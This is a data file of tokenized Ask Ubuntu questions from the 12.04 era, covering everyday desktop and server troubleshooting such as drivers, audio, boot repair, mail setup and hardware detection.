134709	broken auto-mute after 12.04 upgrade	speakers stay on in ubuntu 12.04 when headphones are plugged into the jack . ( fujitsu t2010 , ich8 chipset , alc262 audio ) . all was working fine in 11.10 . /etc/modprobe.d/alsa-base.conf contains options snd-hda-intel model=fujitsu which used to be working before . i submitted a bug report ( https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/997420 ) , but in the meantime i am looking for an acceptable solution . right now i ca n't use my laptop to listen to music or watch videos in public places , which is very frustrating . is there some workaround that will allow to mute the speakers while listening to the headphone output ?
134713	accidentally uninstalled most of my programs ... help ?	i did an 'apt-get remove ' on a whole bunch of packages including zip , curl , libx11-dev , libglib2.0-dev , etc . and , after i did that , nearly all of my applications have silently disappeared ( i believe that that is what caused it although i 'm not 100 % ... i also uninstalled my python installation and did some other stuff before i finally went to go and open a program [ terminal ] and found that most of my programs were gone including ubuntu software center , etc ... basically nearly everything ) . does anyone know what may have caused this or , better , how to refresh everything ? ( no , i did n't create a restore point : - ( ) or , am i hosed ?
134715	fortinet ssl vpn client and ubuntu 12.04	i want to install the forticlient ssl vpn client on ubuntu 12.04 . i 've downloaded the latest version from the fortinent support site but when i try to run the installer ( vă­a command line or gui ) it simply does nothing . i have tried to install both with and without sudo but nothing happens . i remember some time ago that i successfully installed the same client in centos and the client worked fine . can anyone help me to install this ?
134716	is there a way to have presets for your terminal in ubuntu ?	i do ruby on rails development and usually have three different tabs set up in my terminal ; one for running tests , one for editing code and running commands , and one to run the rails server . it is not a big deal to set this up when i begin working , but it would be much cooler if i could just open the terminal and have everything already set up the way i like it ( 3 tabs all cd to the correct directory with the correct version of rails set in rvm ) . is there a way to just take a snapshot of a terminal set up and hav it just open up like that all the time ?
134725	setup dkim ( domainkeys ) for ubuntu , postfix and mailman	i 'm running ubuntu 12.04 with postfix and mailman . i want to set up dkim . domainkeys identified mail , or dkim , is the successor to yahoo 's `` domainkeys '' . it incorporates cisco 's identified mail . what are the steps for setting this up ? is opendkim recommended ? the only reference i have is howtoforge , but i prefer to get help here ( even if it is just a confirmation of the steps at that link ) . actually , i think the info at howtoforge is outdated because it mentions dkim-filter instead of opendkim .
134728	unity launcher removal	how can i remove the unity launcher in 12.04 completely or at least hide it ? i have tried to uninstall it but i do n't know what it is listed under in the software center . but i really just want to remove it completely .
134730	backup/migrate all fonts from 11.10 to 12.04 ( all locations )	i do n't know whether this is correct , but i seem to recall that there are multiple places to store fonts , especially with true type stuff , and multiple ways to install them ( some i double click , some i copy to folders , etc. ) . i do n't recall where i would have put mine , or how i would have installed , ( did i accidentally sudo install some , but not others ? maybe ) , so i 'm hoping someone can give me a recipe for where i should copy /all/ old 11.10 fonts from , and where i should copy them to on my 12.04 system -- -including anything i need to be mindful of with permissions , etc .
134734	ubuntu 12.04 desktop edition not detecting my laptop and keyboard	recently i installed ubuntu 12.04 on my usb flash drive and loaded it on my laptop . it was good and i was able to work . my keyboard and mouse was working fine . i liked the ubuntu and installed on the hard drive of the laptop . installation was smooth . when i booted with ubuntu in laptop it was not at all detecting mouse and keyboard in my laptop . however it was detecting usb keyboard and usb mouse when i attached to it . however it was able to detect keyboard in the grub loader stage . how can not it detect keyboard and mouse when usb ubuntu installation was detecting keyboard and mouse ? what is the use of an operating system with so many features , if it is not able to detect keyboard and mouse ? i searched in the google and there is no convincing answer . is that a permanent bug in the ubuntu ?
134735	is it possible to use binary nvidia driver with geforce 7300 se ?	i have an nvidia geforce 7300 se . it worked fine with the nvidia driver when i was using 10.10 . when i upgraded to 12.04 , the ( nvidia-current ) binary driver failed -- -i could n't even get a login screen . the `` nouveau '' driver works okay , but the display is quite sluggish . i 've read about the fact that my geforce is blacklisted ( here and here ) . but , when i tried the suggested workaround of using nvidia-173 , i discovered that it would n't install because of a failed dependency : xorg-video-abi-10 ( package not available ) . the `` precise '' nvidia-173 package page notes this ( dependency bug ? ) so , my real question : is there a geforce 7300 se workaround for 12.04 ?
134736	update manager shows no update to 12.04	i currently have ubuntu 11.10 and i would like to upgrade to ubuntu 12.04 . however , update manager is saying `` your system is up-to-date '' and `` there are no updates to install . '' when there are things to update , it will update just fine , but it is not displaying upgrade now option . i checked my update manager settings , and it says next to `` notify me of a new ubuntu version '' that it will check `` for any new version . '' but this is not the case , it never gives me the option to upgrade no matter how many times i click `` check . '' i have also tried doing the `` sudo apt-get install '' command in the terminal , but that has not allowed the computer to upgrade either . what am i supposed to do ?
134737	disable keyboard suspend key	how do i disable my keyboard 's suspend key ? my keyboard ( logitech k800 ) has a key for powering off the pc , in ubuntu its working as a suspend button . i 've tried assigning another shortcut to that button , but its not preventing the computer from sleeping . also , i 'm not sure if there 's a difference between suspend and sleep , but it appears to be turning the computer completely off , but when i start it back up it resumes where it left off .
134738	how to change helo address ?	right now my helo address = localhost ( helo=localhost ) . is it better to set this to my server 's domain name ? if so , how do i change it ? i 'm running ubuntu 12.04 and postfix . thanks .
134739	i am not able to delete a corrupt ntfs partition on my pen drive . how can i force its deletion ?	i formatted my 16gb pen drive with the ntfs file system in windows vista . after that i started copying some files . however , only a few files were copied to the pen drive before the copy operation hung . so i cancelled the copy operation . now i am unable to use the pen drive . i do n't really need any files that i copied to the pendrive . i just want to use the pendrive again . i have tried using ubuntu to format the pen drive . but when i use fdisk to delete the partition , it looks like it is working fine but in fact it does not delete the partition . also i am unable to format it with any other file system . when i tried to use gparted , it throws the following error : error mounting : mount exited with exit code 14 : the disk contains an unclean file system ( 0,0 ) . the file system was n't safely closed on window . fixing ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! . if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the dmraid documentation for more details when i searched the internet i found help on how to recover . but i donât want to recover , i want to format it again . when i pressed w after deleting the partition , it took more time than previously . after that i removed the pen drive and re-inserted , but the partition i had deleted was still present . if i simply type the command fdisk /dev/sdb without removing the pen drive after the partition is deleted , then it returns the error message unable to open /dev/sdb . here are the steps that i followed : root @ yesuraj-ubuntu : ~ # fdisk /dev/sdb command ( m for help ) : d selected partition 1 command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . syncing disks the demesg prints are as follows , [ 6139.774753 ] usb 2-1.3 : reset high speed usb device number 4 using ehci_hcd [ 6154.816941 ] usb 2-1.3 : device descriptor read/64 , error -110 [ 6169.968908 ] usb 2-1.3 : device descriptor read/64 , error -110 [ 6170.158427 ] usb 2-1.3 : reset high speed usb device number 4 using ehci_hcd [ 6185.200638 ] usb 2-1.3 : device descriptor read/64 , error -110 [ 6200.352572 ] usb 2-1.3 : device descriptor read/64 , error -110 [ 6200.542093 ] usb 2-1.3 : reset high speed usb device number 4 using ehci_hcd [ 6205.559460 ] usb 2-1.3 : device descriptor read/8 , error -110 i used the dd command and it erased the partition table . but now when i connect the pen drive , dmesg contains this error message : [ 88143.437001 ] sdb : unknown partition table . i am not able to create a partion using fdisk /dev/sdb . the error message says that it is unable to find the node . other messages from dmesg follow below . [ 87100.531596 ] usb 2-1.3 : new high speed usb device number 39 using ehci_hcd [ 87130.915257 ] usb 2-1.3 : new high speed usb device number 40 using ehci_hcd [ 87135.932647 ] usb 2-1.3 : device descriptor read/8 , error -110
134743	how do i make the menu bar opaque when invoking the dash ?	this is an experiment with unity . everybody tried to make top panel in unity transparent . i do n't . i want to make top panel always opaque , even when the dash is open . is it possible ? or are the dash and transparent menu bar united ?
134747	how do i run python 3 ?	the description here says that 12.04 ships with python 3.2.3 as well . what command do i run to get this ? running python -v or python2 -v or python2.7 -v all give me the same result 2.7.3 . there are no other commands with the name python available . do i have to install it ? https : //wiki.ubuntu.com/precisepangolin/releasenotes/ubuntudesktop # precisepangolin.2bac8-releasenotes.2bac8-commoninfrastructure.python_toolchain note : i am not interested in setting python 3.2 as my default interpreter , i just want to know that if it ships , what command runs it .
134748	built-in sd card reader not working	i am using ubuntu 12.04 on a advent 7109b/uniwill l51ii9 . tried both 1 & 2 gb m2 cards ( in both m2 duo & m2 adaptors ) and i know the cards work . the card reader is a 4-in-1 media card reader : sd , mmc , ms , mspro lspci returns the following 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 06:04.0 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 06:04.2 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 01 ) 06:04.3 mass storage controller : o2 micro , inc . integrated ms/xd controller ( rev 01 ) 06:05.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) i know this is similar to other posts , but i can not see one that has been confirmed as solved ( forgive me if this is not accurate ! ) thanks in advance *-generic description : sd host controller product : integrated mmc/sd controller vendor : o2 micro , inc. physical id : 4.2 bus info : pci @ 0000:06:04.2 version : 01 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : driver=sdhci-pci latency=32 resources : irq:18 memory : b0200800-b02008ff *-storage unclaimed description : mass storage controller product : integrated ms/xd controller vendor : o2 micro , inc. physical id : 4.3 bus info : pci @ 0000:06:04.3 version : 01 width : 32 bits clock : 33mhz capabilities : storage pm cap_list configuration : latency=32 resources : memory : f0202000-f0202fff looking at the results of 'sudo lshw ' above , i am wondering if the problem is with the 'unclaimed ' mass storage controller ... ... ... from looking on the internet it would seem like this has been an ongoing problem for previous versions of ubuntu , so i 'm hoping there is an easy fix out there , i just need to find it . again any help or advice would be greatly appreciated .
134749	how can i fix the lag when running ubuntu installed on a usb drive ?	i recently did a fresh install of ubuntu 12.04 . i did it on a 16gb usb flash drive , with 964mb for swap and 13.97gb for ext3 . system specs : 2gb ddr2 ram ( 800~ frequency range ) 3.14ghz single core processor ati 3600 graphics card this is the first time i have gotten ubuntu installed on a usb flash drive ( i had another ubuntu installed on hard drive ) . the ubuntu i had on the hard drive worked marvellously faster than my windows 7 ; for example , i could be running google chrome with around twenty tabs and have photoshop running without any lag . but now with the usb version i can barely have google chrome open with six tabs and browse my home folder at the same time without lag , and freezing of either chrome or the home folder . this is a picture of top being used in the terminal : so could you please help me ? any suggestions will be helpful .
134751	why is 12.04 slowing down my home network ?	i have two pcs on my network ; one is a windows 7 pc and the other is running ubuntu 12.04 . my pc is the one with ubuntu and it is slowing down the network not only for me but for my husband as well . i have used iftop to check out the network traffic and there is none , yet speed tests show that when my pc and only my pc is connected , the speed goes down significantly for both of us . i need help troubleshooting this further because i have never seen anything like this before ...
134762	how do i return to default wallpaper on login screen in lightdm ?	with the change to 12.04 came the new feature of having the login screen matching the selected user 's wallpaper . it 's a cool feature , but not for everyone . i 'd like to go the other way and go back to having a default login screen ( lightdm ) wallpaper that does n't change to match the selected user 's wallpaper . is this possible ?
134763	how do i add a keyboard model to ubuntu and give back that model to the community ?	hey i have new lenovo z570 laptop recently . it has a unique keyboard . i am able to use it but not to its full capabilities . i am unable to map some of the 'extra ' keys to their respective functions . there is no separate keyboard model for lenovo z570 . i would like to configure this keyboard properly and give back to the ubuntu repos for storage so that later someone else using the same laptop can use my configuration that i have set . how do i do that ?
134765	why ca n't i raise the priority level in 12.04 in gnome-system-monitor	when i go to raise a priority level it displays this i know it says permission denied , but is this a bug ? i can lower it but not raise it . is this normal ? edit : i think this might be a bug , because the only limitation is states in the help value is you ca n't set it to something less than 0 , but i 'm not sure if doing something else wrong
134773	ubuntu 12.04 & wine : no audio via hdmi	fresh install of ubuntu 12.04 and wine 1.5.3 ( official ppa ) ; also briefly attempted to use wine 1.4 ( from repository ) . pc → hdmi → receiver ( plus speakers ) → hdmi → tv totem outputs to hdmi ( to the speakers ) , when the appropriate device is selected though the sound panel , though any wine‐based programs will not—i can only get output through my front headphone port ; my preferred device is ignored by the sound panel . also , i now can not get audio to pass through to my tv’s internal speakers via any means . i was not having any of these issues with ubuntu 11.10 ( fresh install ) .
134775	no upgrade options since booting via cd ubuntu 11.10	i have bootable cd of ubuntu 11.10 but , when i inserted it on my pc , there is no upgrade option from ubuntu 11.10 to 12.04 . can you help me regarding this ? ? thanks .
134776	erratic mouse wheel after upgrade to 12.04	i upgraded from lubuntu 11.10 to lubuntu 12.04 ( runs on vmware server ) . after upgrade , my mouse wheel control do n't work as it should . it works in windows and when i go to vmware remote console to lubuntu it works also until i use wheel . i can go down , but i ca n't go up with wheel ( navigation bar jumps erratically ) . any idea , what is changed ?
134777	is there a faster way to download ubuntu ?	i want to download ubuntu 12.04 , but it seems to take a long time , i.e . 1 day via google chrome , or mozilla firefox . can you suggest an alternative way to download it faster ( e.g . 2 hours ) ? ?
134788	i used boot-repair . now my laptop is stuck on the grub screen . how do i boot ?	i have ubuntu 10.4 and win 7 installed . because of a problem windows 7 would n't load but ubuntu would load . i wanted the grub2 menu to be the default boot menu and i thought boot-repair would do the needful for me . i just opened boot repair and clicked on 'recommended repair ' with the default settings left unchanged and now i 'm stuck on the grub menu with the black screen . how do i get the previous config back ?
134790	proposed bug : compiz delay in changing window focus	ubuntu-bug really , really seems to want me to ask this as a question on askbuntu.com rather than reporting it as a bug . so i am . my machine ( for which ubuntu-bug has not attached any details for you , but two salient details are that it 's an nv graphics card and 2 x 1920 x 1200 heads ) takes roughly a half second to change window focus when i move the mouse to a new window . this is very long , enough that i have to think to wait . a reasonable goal in human interface design would be under a tenth of a second . it 's worth noting that i am using sloppy focus mode ( focus follows mouse-enter events ) . i 'm not quite sure how to phrase this as a question , unless the question is `` what 's the right way to report this as a bug ? '' or maybe `` any suggestions how to tune compiz , and how can we make it so ubuntu users do n't have to tune compiz ? '' . thanks .
134792	mouse and trackpad stopped working on an asus eee1215n	i have an asus eee 1215n . i upgraded to ubuntu 12.04 and the usb mouse and trackpad just stopped working . what could 've caused that ? how do i go about debugging it ?
134794	how can i boot into ubuntu after repairing windows 7 ?	i installed ubuntu 12.04 alongside windows 7 . i then fiddled around with easybcd and managed to stuff up the boot info and windows would n't boot , etc . i then repaired windows via an install cd but now i do n't have an option to boot into ubuntu , it boots straight into windows . how do i boot into ubuntu now ?
134801	mobile broadband issue in 12.04	i installed 12.04 few days back . and mobile broadband ( reliance netconnect+ ) was working fine . however since yesterday , it is not working ... mobile braodband option is disabled and not enabling even if i am checking the option . i cant digest this sudden change . ps . day before yesterday , network bar was not showing while internet was wroking fine .
134806	`` can not load such file -- openssl '' when running bundle	when i try to use bundler , i get the error : /home/vivek/.rvm/rubies/ruby-1.9.3-p194/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- openssl ( loaderror ) the complete error message is below . how do i fix this ? fetching gem metadata from https : //rubygems.org/.unfortunately , a fatal error has occurred . please report this error to the bundler issue tracker at https : //github.com/carlhuda/bundler/issues so that we can fix it . please include the full output of the command , your gemfile and gemfile.lock . thanks ! /home/vivek/.rvm/rubies/ruby-1.9.3-p194/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- openssl ( loaderror ) from /home/vivek/.rvm/rubies/ruby-1.9.3-p194/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /home/vivek/.rvm/rubies/ruby-1.9.3-p194/lib/ruby/1.9.1/net/https.rb:22 : in ` < top ( required ) > ' from /home/vivek/.rvm/rubies/ruby-1.9.3-p194/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /home/vivek/.rvm/rubies/ruby-1.9.3-p194/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/net/http/persistent.rb:447 : in `ssl' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/net/http/persistent.rb:216 : in `connection_for' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/net/http/persistent.rb:358 : in `request' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/fetcher.rb:135 : in `fetch' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/fetcher.rb:163 : in `fetch_dependency_remote_specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/fetcher.rb:122 : in `fetch_remote_specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/fetcher.rb:70 : in `specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/source.rb:234 : in `block in remote_specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/source.rb:232 : in `each' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/source.rb:232 : in `remote_specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/source.rb:165 : in `fetch_specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/source.rb:70 : in `specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:205 : in `block ( 2 levels ) in index' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:202 : in `each' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:202 : in `block in index' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/index.rb:9 : in `build' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:198 : in `index' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:192 : in `resolve' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:127 : in `specs' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/definition.rb:122 : in `resolve_remotely ! ' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/installer.rb:48 : in `run' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/installer.rb:12 : in `install' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/cli.rb:220 : in `install' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/thor/task.rb:22 : in `run' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/thor/invocation.rb:118 : in `invoke_task' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/thor.rb:263 : in `dispatch' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/lib/bundler/vendor/thor/base.rb:386 : in `start' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.3/bin/bundle:13 : in ` < top ( required ) > ' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/bin/bundle:23 : in `load' from /home/vivek/.rvm/gems/ruby-1.9.3-p194 @ global/bin/bundle:23 : in ` < main > '
134810	external display	i have a dell 2007wfp ( analog ) external monitor which does n't get picked up on the display panel . i 'm running a thinkpad w520 with switchable graphics ; the graphics card is a nvidia quadro 2000m . i ran the additional drivers which did n't detect anything required to install .
134812	how do i prevent ubuntu from changing my laptop screen brightness level ?	i have installed ubuntu 12.04 lts on my dell inspiron 1464 . everything is working fine . except my led brightness . every time i adjust it to my suitable level . but after reboot it goes on high as it was before . this is quite irritating specially at night . i do not face this problem in previous version . how can i lock my brightness to my preference ?
134814	apple alu keyboard on precise	my apple keyboard ( iso ) does n't work correctly in ubuntu 12.04 but worked flawless in lucid . can anyone help ?
134833	does anyone know how to automatically login to a website using a shell script ?	i 'd like to know if there was a way to login to a website by specifying login credentials in a shell script and automatically login by running the shell script .
134839	download c compiler to ubuntu	how can i download pic18 v3.38 in lite mode as c-compiler to mplab ? i could not see any link to repository . can i download it with sudo apt-get install ? note : i am not using wine ubuntu 10.04
134841	replace realtek r8168 network card to enable wake-on-lan ?	i 've been struggling with wake-on-lan ( wol ) capability of my onboard realtek rtl8111/8168b ethernet controller ( mb : gigabyte z68ap-d3 ) for almost a week now . the main issue seems to be that network card is switched off completely during shutdown ( i.e. , both link and ( act ) ivity led lights are off ) . i made an extensive review of similar issues and tried the following ( among others ) : putting ethtool -s eth0 wol g to rc.local file . installing latest r8168 driver ( s ) from realtek . putting echo -n `` my_lan_id '' > > /proc/acpi/wakeup to rc.local file . switching wol option on and off in bios . i can find no way to prepare my nic to work properly so i decided to try with external pci network card . please suggest me which network card should i try to enable wol ? ( maybe intel速 pro/1000 gt desktop adapter ? )
134842	dpkg : error : duplicate file trigger interest for filename `/usr/lib/gio/modules ' and package `libglib2.0-0 : i386 '	i had very similar issue which was described in this question - ambiguous package name 'libglib2.0-0 ' with more than one installed instance . it did n't give me solution , but i have modified /var/lib/dpkg/status and i have removed duplication of ligbglib2-0-0 or something like it . i 've started to get a new error , which is almost exactly the same , but i ca n't see anything that 's duplicated in /var/lib/dpkg/status now . any ideas ?
134847	install windows 7 and ubuntu 12.04 from the same usb	i am planning to do a fresh install of windows and ubuntu 12.04 on my laptop . i plan to do it with my 4 gb pen drive . what the problem is that i want to have both the bootable windows installer and ubuntu installer together . ( because once i install windows i 'd be formatting my drive and reserving space for the subsequent ubuntu install and i can not make a bootable ubuntu ) is there a way to make a bootbale pen drive which would install windows and ubuntu both ? ps : the windows iso is 2 gigs and the ubuntu one is like 700 mb , so it should fit in the pen drive , right ?
134848	how can i make brightness control work ?	i have xubuntu 12.04 with latest updates on toshiba satellite a210-15k laptop semen @ bloknot : ~ $ uname -a linux bloknot 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux ... and i ca n't adjust lcd brightness ( . i tried to use fnfx tool : semen @ bloknot : ~ $ fnfx-client fnfx client v0.3 ( c ) 2003 , 2004 timo hoenig < thoenig @ nouse.net > fatal error : could not open `` /home/semen/.fnfxrc '' . please make sure that the default config is accessible . ... and xbacklight : semen @ bloknot : ~ $ xbacklight no outputs have backlight property ... and i tried to add acpi_osi=linux and acpi_backlight=vendor parameters in grub config , but nothing happens . i soppose .fnfxrc file must be available after installation or first fnfx demon lauch . is n't it ? semen @ bloknot : ~ $ cat /sys/class/backlight/toshiba/brightness -5 semen @ bloknot : ~ $ cat /sys/class/backlight/toshiba/max_brightness 7 semen @ bloknot : ~ $ echo 6 | sudo tee /sys/class/backlight/toshiba/brightness [ sudo ] password for semen : 6 ... ... but brightness is the same . help , please . p.s . execuse me for my poor english . upd . i have spent 2 days to solve this boring problem , but i ca n't . so . if i wish linux work correctly , i have to choose another distro .
134849	how do which sites i have selected affect updates ?	does it matter what site you choose for updates ? do you get the same updates no matter what site you choose ?
134853	gedit tries to open everything !	i am having a huge problem . whenever i try to open a file gedit tries to open it . for example i download something with firefox , i click on the file to open it and gedit opens ! even in when i want to open a non-java file ( images , pdfs , .. ) from my eclipse explorer it gedit tries to open . more strangely , whenever , i try to open my home folder or any other folders such as music , pictures , ... from menu it happens ! can someone help me ? thx
134854	trouble using wubi to install xubuntu . can anyone help ?	i am a extremely curious person so i wanted to try linux , however i have very little knowledge on such a thing . i have successfully installed ubuntu with wubi on a newer computer , so i wanted to try it on a slightly older computer . when i installed ubuntu 12.04 lts to was incredibly , no sorry unbearably slow and so i started to think of using 'lightweight ubuntu flavors ' like xubuntu or lubuntu ( both 12.04 lts ) . using wubi i tried to install both but both failed the first time they booted up . they would at first load up then work through things like coping the files . here is where the problem starts . a little over half way through copying files it crashes and comes up with a black screen with white writing and a blurry line through the middle ( horizontally ) . also the capslock light starts flashing nonstop.i do n't have the slightest idea what to do and i am in desperate need of help . how can i install xubuntu or lubuntu using wubi and how can i install ( and run of course ! ) successfully without any of the above problems to occur ? any answer would be highly appreciated . please help me ! ( thank you in advance ) drew
134855	ssd over usb drive server	i 'm thinking upgrading my server usb drive to a ssd where it will be installed ubuntu 12.04 and i was wondering if there will be any improvement over the usb ? thanks
134856	ubuntu one windows client - proxy settings	i want to use the windows client for ubuntu one but i have problems while signing in . my internet connection uses a proxy server . therfore the ubuntu one client asked me for the login information . but the client is not able access the proxy server . all it does is loading for a long time . i think i might have typed the wrong login information . but the client does not ask again for the proxy details . i tried to reinstall the client . but then the client does nothing at the first start . the elements are grey and i can not click on anything . i think the program saved the ( probably wrong ) proxy information and tries at start to connect . how can i change or delete the proxy configuration ?
134857	printer idle status in ubuntu 64bit with canon lbp6000	another canon printer problem with ubuntu . i have installed my canon lbp6000 in ubuntu using several tutorials of different web sites . here is the property page of my printer . when i print any document it says it is printing and after some seconds it says printing is completed . but it does n't print anything at all . i think something is wrong with it , but do n't know what . i have been trying to manage it during 3 months but without any success . could anybody help me to configure my printer so that i could use it in ubuntu please ? if any further information needed i can provide it without any problem . thank you .
134859	ca n't delete a file with nautilus on 12.04 from desktop	ca n't delete a file in nautilus , the delete menu is inactive . what can be a reason ? if just selecting a file with a cursor and pressing del on keyboard the file moves to the thash and then i can delete it from trash as usual but not with nautilus direcly from a desktop .
134866	isdone.dll problem , running elder scrolls v on wine , how to fix it with wine ?	i got a problem running some game installers on wine , and i get an error named isdone.dll how can i fix it on wine ? this dll file is not found in winetricks . please help ... for now , installing the elder scrolls v : skyrim and its picture of error :
134867	proxy configuration change	there used to be an option in proxy configuration that was : use this proxy server for all protocols however , in 12.04 , i ca n't find it . is there anyway to reproduce its behavior in a handy way ? i ca n't seem to find it . i tried to install gnome-network-properties to get the old applet back but sadly it 's part of gnome-control-center and i have that installed already . any hint on how to proceed will be appreciated .
134874	how to auto-scan any plugged in usb storage device with clamav ?	i 'd like to do an automatic virus scan on any plugged in usb device using clamav . i 'm using ubuntu 12.04 . the closest thing i found was : run clamav on mount of flashdrive how to run a shell script when a new usb storage device is detected ? the first one is not working for me and the second one seems to target a known device . is there a tutorial around i 've missed ? or can i get some help with udev rules that apply to any usb storage device added ? currently nothing seems to do anything .
134875	how to get rid of wine programs in the right click context menu ?	a long time ago i had installed wine for emulating photoshop cs5 , but as it di n't do a good job i uninstalled it . but even after uinstalling it i still have wine programs on the right click context menu . how do i get rid of these ? ? ?
134876	remote ubuntu ( mint ) becomes unreachable after running upgrade to oneiric	got this message when i logged in and decided to upgrade . i am a noob . so anyways , i ran the command and next thing i know , i can no longer log into it after the reboot . what the heck happened ? i get ssh : connect to host xxx.xxx.xxxx port 22 : network is unreachable new release 'oneiric ' available . run 'do-release-upgrade ' to upgrade to it .
134878	no xorg.conf and can not detect ati radeon 9600 pro video card 12.04	i have previously change xorg.conf files to adjust my screen location , but i am stuck with 800x600 or 1024x800 and no other resolutions lspci | grep vga detects the card but i do not get the resolutions that should be associated with the card . i have been unable to adjust the video card on my xserver on 12.04 . i have tried to boot into recovery mode and run sudo dpkg-reconfigure xserver-xorg , i can not find the xorg.conf file when i do a sudo find / -name xorg.conf find no files , sudo find / -name xorg* finds directories and files . thank you for taking the time to read the question wayne
